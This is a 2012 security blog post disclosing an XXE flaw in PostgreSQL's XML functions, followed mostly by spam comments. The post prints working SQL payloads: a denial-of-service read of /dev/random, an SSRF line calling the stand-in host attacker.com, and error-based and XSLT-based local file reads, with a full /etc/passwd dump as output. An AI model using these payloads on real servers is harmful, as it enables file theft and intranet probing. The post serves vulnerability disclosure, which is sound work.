пятница, 1 июня 2012 г.

PostgreSQL (all) error-based XXE 0day

Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).

Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE:

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^
UPDATE!
Classical XXE from XSLT transformation found.
Reading any data are possible also:


SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
                                     xslt_process                                    
-----------------------------------------------------------------------------------------
 <?xml version="1.0"?>
 <samples><sample>root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 Debian-exim:x:111:115::/var/spool/exim4:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 oracle:x:1002:1002::/u01/app/oracle:/bin/bash
 </sample></samples>

(1 row)

24 комментария:

  1. I'd like to notice that xslt_process is from xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.

    PS. That's why I wasn't able to discover this file-reading during phdays =)

    [1] http://www.postgresql.org/docs/9.1/static/xml2.html

    ОтветитьУдалить
  2. Thanks for sharing, nice post! Post really provice useful information!

    Giaonhan247 chuyên dịch vụ mua hộ hàng mỹ với các mặt hàng từ pandora úc hay từ web ebay việt nam cùng với bảng giá gửi hàng đi mỹ uy tín, giá rẻ.

    ОтветитьУдалить
  3. On the drawback the Setup HP Officejet 3830 Printer 123.hp.com/oj3830 has no Ethernet for wired systems and the manual page turning for the twofold side printing.

    ОтветитьУдалить
  4. It is important to seek statistics coursework writing services and statistics essay writing services since students find help when they visit Business Statistics Writing Services.

    ОтветитьУдалить
  5. If you found any login related issue in your Quickbooks software, you can download Quickbooks Tool Hub which is the hub of all necessary tools which are used to diagnose issues. It can fix all minor and major issues.

    ОтветитьУдалить
  6. I’m truly enjoying the design and layout of your site. It’s a very easy on the eyes which makes it much more enjoyable for me to come here and visit more often. Did you hire out a designer to create your theme? Exceptional work! Feel free to visit my website; 온라인카지노사이트

    ОтветитьУдалить
  7. Hi! This is my first visit to your blog! We are a team of volunteers and new initiatives in the same niche. Blog gave us useful information to work. You have done an amazing job Feel free to visit my website; 카지노사이트링크

    ОтветитьУдалить
  8. Nice one! Thank you for sharing this post. Your blog posts are more interesting and impressive. Feel free to visit my website; 온라인카지노사이트넷

    ОтветитьУдалить
  9. The most common legal entity (business) established in Latvia, Lithuania and Estonia is a limited liability company, also known as LLC. This type of enterprise provides its owner with business opportunities while limiting the risk of direct investment and without affecting his personal obligations. There are no restrictions on the creation of a company - an enterprise can be created by a resident, non-resident or legal entity. In Latvia the LLC is called SIA, in Estonia - OÜ, and in Lithuania - UAB. https://www.baltic-legal.com/business-support-services-eng.htm

    ОтветитьУдалить